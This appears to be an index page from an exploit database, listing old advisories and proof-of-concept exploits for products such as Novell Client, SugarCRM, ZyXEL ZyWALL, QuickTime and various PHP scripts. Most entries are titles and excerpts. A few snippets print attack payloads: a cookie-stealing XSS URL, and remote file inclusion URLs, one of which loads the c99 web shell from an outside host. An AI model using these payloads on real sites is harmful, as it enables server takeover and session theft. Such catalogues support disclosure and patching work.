Novell Client <= 4.91 SP4 Local Stack overflow / B.S.O.D (unauthentificated user)
Application: Novell Client <= 4.91 SP4 Web Site: http://www.novell.com/products/clients/ Platform: Windows Bug: Local Stack overflow / B.S.O.D (unauthentificated user) Impact: Critical 1) Introduction 2) Bug 3) Proof of concept 4) Credits =========== 1) Introduction =========== "Novell Client™.....
SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability
Exploit for unknown platform in category web...
SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure
Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow
Noticeware Email Server 4.6.1.0 - Denial of Service
ZyXEL ZyWALL Quagga/Zebra (default pass) Remote Root Vulnerability
Exploit for hardware platform in category remote...
ZYXEL ZyWALL Quagga/Zebra - Default Password Remote Code Execution
EPSS: 0.183
CVSS: 9.8
Two vulnerabilities for PatchLink Update Client for Unix.
PatchLink Update Unix Client File clobbering vulnerability Larry W. Cashdollar Vapid Labs 1/17/2008 Overview From the vendor: “PatchLink Update™ provides rapid, accurate and secure patch management, allowing you to proactively manage threats by automating the collection, analysis and delivery of...
PHP Webquest 2.6 Get Database Credentials Vulnerability
Exploit for unknown platform in category web...
Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)
Microsoft Windows Media Player - .AIFF Divide By Zero Exception Denial of Service (PoC)
Lotus Notes buffer overflow in the Lotus WorkSheet file processor
Advisory Information Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor Advisory ID: CORE-2007-0821 Date published: 2007-11-27 Date of last update: 2007-11-27 Vendors contacted: IBM Corp. Release mode: COORDINATED RELEASE Vulnerability Information Class: Input validation...
EPSS: 0.071
InnovaShop™® (mgs.jps) Cross Siting Scripting
InnovaShop™® (mgs.jps) Cross Siting Scripting Download: http://www.innovaage.com/ http://www.innovaportal.com/ Bug found by JosS / Jose Luis Góngora Fernández Contact: sys-project[at]hotmail.com Spanish Hackers Team www.spanish-hackers.com /server irc.freenode.net /join #fullsecure d0rk: "Site...
OdysseySuite™ Internet Banking vuln.
OdysseySuite™ Internet Banking vuln. Vuln. discovered by : r0t Date: 1 October 2007 Vendor:http://www.megasol.se/odysseysuite.asp affected versions:current* orginal advisory: http://pridels-team.blogspot.com/2007/10/odysseysuite-internet-banking-vuln.html OdysseySuite™ contains a flaw that...
IPSwitch IMail Server 8.0x - Remote Heap Overflow
Mitridat Form Processor Pro XSS
Greetings, I have discovered cross-site scripting vulnerability in Mitridat's Form Processor Pro. http://www.mitridat.com/ http://www.mitridat.com/products-form-processor-pro.html Form Mail: Email Form Processor Pro™ - process all forms on your website Form Mail: Email Form Processor Pro is the...
PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability
No description provided by...
PsNews 1.1 - show.php?newspath Local File Inclusion
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW)
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW) Vulnerability: http://www.target.com/index.php?Page=Sayfa&No="><script>alert(document.cookie)</script> Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET taraf?ndan WIYS Yaz?l?m?™ ile haz?rlanm?st?r. Script :...
Vuln. discovered by : r0t Date: 18 May 2007 vendor:http://www.candypress.com/ affected versions: v3.5.2.14 and prior CandyPress™ Store contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "brand" and "Msg" parameter in "scripts/prodList.asp" isn't properly...
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability
Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability scripts : Pixaria Gallery 1.0 Discovered By : irvian scripts site : http://pixaria.com/ Thanks To : #hitamputih #nyubicrew #patihack special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz...
MOAB-27-01-2007: Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability
Summary The vendor (Telestream) provides the following description of the software: Flip4Mac™ WMV is a collection of QuickTime components that allow you to play, import, and export Windows Media video and audio files on your Mac using your favorite QuickTime-based applications. WMV files use the...
MOAB-23-01-2007: Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability
Summary Apple describes QuickDraw as follows: ...a collection of system software routines that your application can use to perform most image-manipulation operations on Macintosh computers. QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application...
MOAB-21-01-2007: System Preferences writeconfig Local Privilege Escalation Vulnerability
Summary Apple provides the following description in the The Preference Application documentation: System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse,...
MOAB-03-01-2007: Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability
Summary A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a...
MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow
Summary The following description of the software is provided by vendor (Apple): QuickTime 7 makes the future of video crystal clear with new features including user-friendly controls and pristine H.264 video. Upgrade to QuickTime 7 Pro and capture your own movies, then share them with friends and....
MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability
Summary The vendor (Omni Group) provides the following description: You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that makes the Mac user experience superior. It's the sum of a lot of different things that add up to a...
Hackers Center Security Group (http://www.hackerscenter.com/) Doz's Security Advisory Desc: ShopSite Shopping Cart Multiple XSS Risk: Medium ShopSite™ is the easiest-to-use shopping cart software for small to medium-sized businesses. ShopSite ecommerce shopping cart is one of the most...
Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include
Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include Found by : AG-Spider C0ntAct : AG-Spider [at] msn [dot] com Affected Software : One Admin Pro.v4.1 Download Script : http://www.conovo.de/script/OneAdminPro.v4.1.zip <? include($path["docroot"].$path["skin"]. Exploit :- ...
New Bug MiniBB Forum <= 2 Remote File Include (index.php)
Title : MiniBB Forum <= 2 Remote File Include (index.php) Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi} Sorce Code: http://www.minibb.net/download.php?file=minibb20 Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : MiniBB Forum 2 (index.php)version : version [ 2 ].....
@cid stats v2.3 File Include Source Code: http://www.comscripts.com/jump.php?action=script&id=1115 Vulnerable Code:_ install.php3 In Line 41 :_ require("'.$repertoire."/".'stats_fonctions.php3 Exploit :_ http://www.VicTim.com/[@]/install.php3?repertoire=ShElL.txt? Discoverd By : ...
blueshoes-filemanager-4.6_public $it£ : www.blueshoes.org Remote File Include Vulnerability (APP[path][core]) Auth0r : x_w0x c0ntact : x_w0x[at]Hotmail[d0t]com w£lc0m£ In x0|0x ======================================================= C0d£ : ===== ./file.php require_once($APP['path']['core'] ....
phpLedAds 2.0(dir) File Include
phpLedAds 2.0(dir) File Include Source Code: ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip Vulnerable Code:_ click.php & ledad.php & ledad_js.php In Line 41 :_ require_once($dir . '/ad_class.php'); Exploit :_ http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt?...
Hi I find a new vuln ... the vuln :- Auother :- Sp1deR_NeT E-mail :- [email protected] Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . Script :- Smarty-2.6.9 Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt? Example...
Re: Multiple XSS Vulnerabilities in Zen Cart 1.3.5
Full Disclosure Armorize Technologies Security Advisory Advisory No: Armorize-ADV-2006-0003 Status: Full Date: 2006/9/27 Summary: Armorize-ADV-2006-0003 discloses multiple cross-site scripting vulnerabilities that are found in Zen Cart, which is a PHP e-commerce shopping program and is Built on a.....
Hi..... The Vuln :- Found By Sp1deR_NeT My Site :- www.sp1der-n3t.com ++ www.pal-hacking.com My E-mail :- Sp1deR_NeT We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . (Palestinan HackerS TeAm) Script :- SmartyValidate-2.8 Search in Yahoo/Google :- "SmartyValidate-2.8" ======== Exploit :-...